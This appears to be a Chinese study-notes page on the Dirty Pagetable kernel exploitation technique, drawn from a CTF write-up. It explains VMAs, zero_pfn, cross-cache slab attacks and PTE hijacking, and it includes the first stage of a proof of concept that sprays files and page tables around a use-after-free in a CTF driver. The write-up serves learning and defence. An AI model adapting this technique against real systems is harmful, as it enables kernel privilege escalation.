> For the complete documentation index, see [llms.txt](https://lightc.gitbook.io/pwn-gitbook/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://lightc.gitbook.io/pwn-gitbook/kpwn/kpwn-tricks/dirtypagetable-yuan-li.md).

# Dirty-Pagetable原理

### fetipop

[fetipop – kqx](https://kqx.io/post/fetipop/)

调用mmap时并不会立即建立到物理页的映射，内核只是先创建一个VMA，即用于描述用户空间一段虚拟地址映射的结构体

其结构体如下

[mm\_types.h - include/linux/mm\_types.h - Linux source code v7.0.10 - Bootlin Elixir Cross Referencer](https://elixir.bootlin.com/linux/v7.0.10/source/include/linux/mm_types.h#L913)

```c
/*
 * Descriptor of one virtual memory area (VMA): a contiguous range
 * [vm_start; vm_end) of addresses inside the address space vm_mm, together
 * with its page protection, flags, backing file/offset and the links used to
 * find it from anon_vma lists and the address_space->i_mmap interval tree.
 *
 * Quoted from include/linux/mm_types.h. Several members only exist when the
 * CONFIG_* option guarding them is enabled, and __randomize_layout means the
 * member order shown here is not necessarily the in-memory order.
 */
struct vm_area_struct {
	/* The first cache line has the info for VMA tree walking. */

	union {
		struct {
			/* VMA covers [vm_start; vm_end) addresses within mm */
			unsigned long vm_start;
			unsigned long vm_end;
		};
		freeptr_t vm_freeptr; /* Pointer used by SLAB_TYPESAFE_BY_RCU */
	};

	/*
	 * The address space we belong to.
	 * Unstable RCU readers are allowed to read this.
	 */
	struct mm_struct *vm_mm;
	pgprot_t vm_page_prot;          /* Access permissions of this VMA. */

	/*
	 * Flags, see mm.h.
	 * To modify use vm_flags_{init|reset|set|clear|mod} functions.
	 * Preferably, use vma_flags_xxx() functions.
	 */
	union {
		/* Temporary while VMA flags are being converted. */
		const vm_flags_t vm_flags;
		vma_flags_t flags;
	};

#ifdef CONFIG_PER_VMA_LOCK
	/*
	 * Can only be written (using WRITE_ONCE()) while holding both:
	 *  - mmap_lock (in write mode)
	 *  - vm_refcnt bit at VM_REFCNT_EXCLUDE_READERS_FLAG is set
	 * Can be read reliably while holding one of:
	 *  - mmap_lock (in read or write mode)
	 *  - vm_refcnt bit at VM_REFCNT_EXCLUDE_READERS_BIT is set or vm_refcnt > 1
	 * Can be read unreliably (using READ_ONCE()) for pessimistic bailout
	 * while holding nothing (except RCU to keep the VMA struct allocated).
	 *
	 * This sequence counter is explicitly allowed to overflow; sequence
	 * counter reuse can only lead to occasional unnecessary use of the
	 * slowpath.
	 */
	unsigned int vm_lock_seq;
#endif
	/*
	 * A file's MAP_PRIVATE vma can be in both i_mmap tree and anon_vma
	 * list, after a COW of one of the file pages.	A MAP_SHARED vma
	 * can only be in the i_mmap tree.  An anonymous MAP_PRIVATE, stack
	 * or brk vma (with NULL file) can only be in an anon_vma list.
	 */
	struct list_head anon_vma_chain; /* Serialized by mmap_lock &
					  * page_table_lock */
	struct anon_vma *anon_vma;	/* Serialized by page_table_lock */

	/* Function pointers to deal with this struct. */
	const struct vm_operations_struct *vm_ops;

	/* Information about our backing store: */
	unsigned long vm_pgoff;		/* Offset (within vm_file) in PAGE_SIZE
					   units */
	struct file * vm_file;		/* File we map to (can be NULL). */
	void * vm_private_data;		/* was vm_pte (shared mem) */

#ifdef CONFIG_SWAP
	atomic_long_t swap_readahead_info;
#endif
#ifndef CONFIG_MMU
	struct vm_region *vm_region;	/* NOMMU mapping region */
#endif
#ifdef CONFIG_NUMA
	struct mempolicy *vm_policy;	/* NUMA policy for the VMA */
#endif
#ifdef CONFIG_NUMA_BALANCING
	struct vma_numab_state *numab_state;	/* NUMA Balancing state */
#endif
#ifdef CONFIG_PER_VMA_LOCK
	/*
	 * Used to keep track of firstly, whether the VMA is attached, secondly,
	 * if attached, how many read locks are taken, and thirdly, if the
	 * VM_REFCNT_EXCLUDE_READERS_FLAG is set, whether any read locks held
	 * are currently in the process of being excluded.
	 *
	 * This value can be equal to:
	 *
	 * 0 - Detached. IMPORTANT: when the refcnt is zero, readers cannot
	 * increment it.
	 *
	 * 1 - Attached and either unlocked or write-locked. Write locks are
	 * identified via __is_vma_write_locked() which checks for equality of
	 * vma->vm_lock_seq and mm->mm_lock_seq.
	 *
	 * >1, < VM_REFCNT_EXCLUDE_READERS_FLAG - Read-locked or (unlikely)
	 * write-locked with other threads having temporarily incremented the
	 * reference count prior to determining it is write-locked and
	 * decrementing it again.
	 *
	 * VM_REFCNT_EXCLUDE_READERS_FLAG - Detached, pending
	 * __vma_end_exclude_readers() completion which will decrement the
	 * reference count to zero. IMPORTANT - at this stage no further readers
	 * can increment the reference count. It can only be reduced.
	 *
	 * VM_REFCNT_EXCLUDE_READERS_FLAG + 1 - A thread is either write-locking
	 * an attached VMA and has yet to invoke __vma_end_exclude_readers(),
	 * OR a thread is detaching a VMA and is waiting on a single spurious
	 * reader in order to decrement the reference count. IMPORTANT - as
	 * above, no further readers can increment the reference count.
	 *
	 * > VM_REFCNT_EXCLUDE_READERS_FLAG + 1 - A thread is either
	 * write-locking or detaching a VMA is waiting on readers to
	 * exit. IMPORTANT - as above, no further readers can increment the
	 * reference count.
	 *
	 * NOTE: Unstable RCU readers are allowed to read this.
	 */
	refcount_t vm_refcnt ____cacheline_aligned_in_smp;
#ifdef CONFIG_DEBUG_LOCK_ALLOC
	struct lockdep_map vmlock_dep_map;
#endif
#endif
	/*
	 * For areas with an address space and backing store,
	 * linkage into the address_space->i_mmap interval tree.
	 *
	 */
	struct {
		struct rb_node rb;
		unsigned long rb_subtree_last;
	} shared;
#ifdef CONFIG_ANON_VMA_NAME
	/*
	 * For private and shared anonymous mappings, a pointer to a null
	 * terminated string containing the name given to the vma, or NULL if
	 * unnamed. Serialized by mmap_lock. Use anon_vma_name to access.
	 */
	struct anon_vma_name *anon_name;
#endif
	struct vm_userfaultfd_ctx vm_userfaultfd_ctx;
#ifdef __HAVE_PFNMAP_TRACKING
	struct pfnmap_track_ctx *pfnmap_track_ctx;
#endif
} __randomize_layout;
```

对这类匿名映射，首次读取尚未写入的页时，内核会把对应的页表项指向zero\_pfn（零页的页帧号，page frame number），权限设为只读；这样读到的内容全是0x00，既满足了要求，也提高了效率，在真正存储数据之前无需消耗物理内存

对未映射的地址进行写入操作触发缺页异常，内核会遍历VMA，如果发生异常的地址存在对应的VMA，则会分配并映射物理页，进程继续执行

通过映射zero\_pfn可以泄露一个属于内核内存区域的地址

在每个Linux版本中，IDT都紧跟在zero\_pfn之后映射，这意味着只要能够破坏PTE（页表项），就可以获得对IDT的读写访问权限，进而实现权限提升

常见的利用方法例如：

**struct file UAF**

[Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup - CTFするぞ](https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606)

[m0leCon\_CTF\_Finals / keasy — writeups-2023 — Bitbucket](https://bitbucket.org/ptr-yudai/writeups-2023/src/master/m0leCon_CTF_Finals/keasy/)

struct file是从专用的slab缓存（filp）中分配的，文件以外的对象不会占据被UAF的file对象；但即使漏洞对象位于这样的专用SLAB缓存中，也可以借助下面的方法完成利用

**cross-cache attack**

先在专用缓存中堆喷大量对象，对其中一个对象触发UAF，再把其余对象全部释放，使该对象所在的slab页面被整体释放回伙伴系统

从伙伴系统取回释放的页面进行利用

**dirty cred**

**dirty pagetable**

虚拟地址通过四级页表转变为物理地址，这种方法针对的是PTE（物理内存前的最后一级映射）

创建新的PTE时，伙伴系统为PTE分配对应的物理页帧

我们可以在UAF的指针上分配一个PTE

```c
/*
 * Pin the calling process to a single CPU.
 *
 * core: index of the CPU the process should be restricted to.
 *
 * The result of sched_setaffinity() is checked: on failure (for example when
 * `core` is not a CPU this process may run on) the error is reported on
 * stderr. Execution then continues, so the function keeps its void interface
 * and existing callers behave as before, but a failed pin is no longer
 * silent.
 */
void bind_core(int core) {
  cpu_set_t cpu_set;

  CPU_ZERO(&cpu_set);
  CPU_SET(core, &cpu_set);

  if (sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set) != 0) {
    perror("sched_setaffinity");
  }
}
...
/*
 * First stage of the PoC: open the vulnerable device, spray open files around
 * the use-after-free, close every sprayed file, then touch the pre-mapped
 * pages so that page faults allocate PTE pages.
 *
 * N_FILESPRAY, N_PAGESPRAY and fatal() come from the part of the file that is
 * elided above; fatal() presumably prints the message and exits (confirm
 * against its definition).
 *
 * Returns 0 after the user presses a key.
 */
int main() {
  int file_spray[N_FILESPRAY];
  void *page_spray[N_PAGESPRAY];
  // Pin CPU (important!)
  bind_core(0);
  // Open vulnerable device
  int fd = open("/dev/keasy", O_RDWR);
  if (fd == -1)
    fatal("/dev/keasy");
  // Prepare pages (PTE not allocated at this moment)
  // Each region is 0x8000 bytes (8 pages of 0x1000) requested at
  // 0xdead0000 + i*0x10000; without MAP_FIXED the address is only a hint.
  for (int i = 0; i < N_PAGESPRAY; i++) {
    page_spray[i] = mmap((void*)(0xdead0000UL + i*0x10000UL),
                         0x8000, PROT_READ|PROT_WRITE,
                         MAP_ANONYMOUS|MAP_SHARED, -1, 0);
    if (page_spray[i] == MAP_FAILED) fatal("mmap");
  }
  puts("[+] Spraying files...");
  // Spray file (1)
  for (int i = 0; i < N_FILESPRAY/2; i++)
    if ((file_spray[i] = open("/", O_RDONLY)) < 0) fatal("/");
  // Get dangling file descriptor
  // Guessed as "last sprayed fd + 1", i.e. presumably the next fd number the
  // ioctl below hands out; it is not used again in this excerpt.
  int ezfd = file_spray[N_FILESPRAY/2-1] + 1;
  // The ioctl is expected to return non-zero; a return of 0 is treated as
  // a failed trigger.
  if (ioctl(fd, 0, 0xdeadbeef) == 0) // Use-after-Free
    fatal("ioctl did not fail");
  // Spray file (2)
  for (int i = N_FILESPRAY/2; i < N_FILESPRAY; i++)
    if ((file_spray[i] = open("/", O_RDONLY)) < 0) fatal("/");
  puts("[+] Releasing files...");
  // Release the page for file slab cache
  for (int i = 0; i < N_FILESPRAY; i++)
    close(file_spray[i]);
  puts("[+] Allocating PTEs...");
  // Allocate many PTEs (page fault)
  // Writes one byte ('A'..'H') into each of the 8 pages of every region.
  // NOTE(review): page_spray[i] + j*0x1000 is arithmetic on void*, which is
  // a GNU C extension rather than standard C.
  for (int i = 0; i < N_PAGESPRAY; i++)
    for (int j = 0; j < 8; j++)
      *(char*)(page_spray[i] + j*0x1000) = 'A' + j;
  // Block until a key is pressed (presumably so the state can be inspected).
  getchar();
  return 0;
}
```
